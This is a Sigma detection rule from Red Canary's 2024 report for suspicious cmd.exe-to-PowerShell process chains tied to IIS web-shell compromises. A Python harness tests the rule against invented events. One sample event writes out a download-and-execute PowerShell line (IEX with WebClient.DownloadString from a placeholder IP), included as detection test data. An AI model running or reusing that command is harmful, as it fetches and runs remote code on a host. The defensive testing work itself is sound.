Unusual or Suspicious Process Ancestry - Command Shell

We have a lot of detection analytics that seek out suspicious or unusual process lineage spawning cmd.exe or spawned from it. Most of them rarely generate confirmed threat detections, but they occasionally flag important threats, like Exchange compromises. One semi-common pattern in our library of analytics is suspicious process interaction between the Windows IIS worker process (w3wp.exe) and the command shell. The following amalgamation of analytics might help you detect a diverse array of malicious activity related to web server compromises. Part of the Red Canary 2024 Threat Detection Report.

Sigma rule

```yaml
title: Unusual or Suspicious Process Ancestry - Command Shell
id: 64d04088-5ed5-4125-9219-4bbedec13e9f
status: experimental
description: |
    We have a lot of detection analytics that seek out suspicious or unusual process
    lineage spawning cmd.exe or spawned from it. Most of them rarely generate confirmed
    threat detections, but they occasionally flag important threats, like Exchange
    compromises. One semi-common pattern in our library of analytics is suspicious
    process interaction between the Windows IIS worker process (w3wp.exe) and the command
    shell. The following amalgamation of analytics might help you detect a diverse array of
    malicious activity related to web server compromises. Part of the Red Canary 2024 Threat
    Detection Report.
references:
    - https://redcanary.com/threat-detection-report/techniques/windows-command-shell/
author: RedCanary, Sigma formatting by Micah Babinski
date: 2024/03/21
tags:
    - attack.execution
    - attack.t1059
    - attack.t1059.003
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        # note: 'GrandParentImage' is not a field in the Sigma process_creation taxonomy, which
        # is modelled on Sysmon. With some log sources, such as Microsoft Defender for Endpoint,
        # you can filter on InitiatingProcessParentFileName == "w3wp.exe" to achieve the same query.
        # GrandParentImage|endswith: '\w3wp.exe'
        ParentImage|endswith: '\cmd.exe'
        ParentCommandLine|contains:
            - 'http://'
            - 'https://'
            - 'echo'
        Image|endswith: '\powershell.exe'
    condition: selection
falsepositives:
    - Unknown
level: low
```
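To see what the selection block above actually matches, the following script evaluates the same three conditions (child is powershell.exe, parent is cmd.exe, parent command line contains a URL scheme or `echo`) over a few constructed process-creation events, and optionally applies the commented-out w3wp.exe grandparent check. This is an added example, not code from the page, from Red Canary or from the Sigma project; the `ProcessEvent` class, its `grandparent_image` field (standing in for an EDR field such as Defender's InitiatingProcessParentFileName) and the sample events are all assumptions made up for illustration.

```python
"""Evaluate the rule's 'selection' logic over constructed process-creation events.

Added example; not the original page's, Red Canary's or Sigma's code.
"""
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record.

    image / parent_image / parent_command_line mirror the Sigma process_creation
    taxonomy. grandparent_image is an assumed extra field that Sigma does not
    define; EDR telemetry (e.g. Defender's InitiatingProcessParentFileName) can
    supply it.
    """
    event_id: str
    image: str
    parent_image: str
    parent_command_line: str
    grandparent_image: str = ""


# Substrings the rule looks for in ParentCommandLine.
PARENT_CMDLINE_MARKERS = ("http://", "https://", "echo")


def matches_selection(ev: ProcessEvent, require_w3wp_grandparent: bool = False) -> bool:
    """Return True when the event satisfies the rule's selection block.

    Sigma string modifiers (endswith/contains) match case-insensitively, so every
    field is lower-cased before comparison.
    """
    image = ev.image.lower()
    parent = ev.parent_image.lower()
    parent_cmdline = ev.parent_command_line.lower()
    if not image.endswith("\\powershell.exe"):
        return False
    if not parent.endswith("\\cmd.exe"):
        return False
    if not any(marker in parent_cmdline for marker in PARENT_CMDLINE_MARKERS):
        return False
    # Optional tightening from the rule's comment: only fire when the command
    # shell itself was spawned by the IIS worker process.
    if require_w3wp_grandparent and not ev.grandparent_image.lower().endswith("\\w3wp.exe"):
        return False
    return True


def evaluate(events, require_w3wp_grandparent: bool = False):
    """Return the ids of all events that match, in input order."""
    return [ev.event_id for ev in events if matches_selection(ev, require_w3wp_grandparent)]


# Constructed sample events; none of this is real telemetry.
SAMPLE_EVENTS = [
    # Web-shell style chain: w3wp.exe -> cmd.exe (inline echo piped to PowerShell) -> powershell.exe
    ProcessEvent("webshell",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\cmd.exe",
                 r'cmd.exe /c echo IEX (New-Object Net.WebClient).DownloadString("http://203.0.113.5/a.ps1") | powershell -',
                 r"C:\Windows\System32\inetsrv\w3wp.exe"),
    # Interactive user: explorer.exe -> cmd.exe (URL on the command line) -> powershell.exe
    ProcessEvent("user-download",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /k curl https://example.test/tool.zip -o tool.zip",
                 r"C:\Windows\explorer.exe"),
    # Scheduled batch job: cmd.exe -> powershell.exe, parent command line is just a script path
    ProcessEvent("batch-job",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c C:\jobs\nightly.bat",
                 r"C:\Windows\System32\svchost.exe"),
    # Same web-shell chain, but the child is pwsh.exe (PowerShell 7); the rule does not cover it
    ProcessEvent("webshell-pwsh",
                 r"C:\Program Files\PowerShell\7\pwsh.exe",
                 r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c echo Get-Process | pwsh -",
                 r"C:\Windows\System32\inetsrv\w3wp.exe"),
]


if __name__ == "__main__":
    print("rule as published :", evaluate(SAMPLE_EVENTS))
    print("with w3wp.exe grandparent:", evaluate(SAMPLE_EVENTS, require_w3wp_grandparent=True))
```

Two things the run makes visible: the published selection fires on the interactive `curl https://...` case as well as on the web-shell chain, which is why the level is low and why the grandparent filter is worth adding where your telemetry can express it; and `Image|endswith: '\powershell.exe'` does not catch pwsh.exe, so the same chain through PowerShell 7 passes silently.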
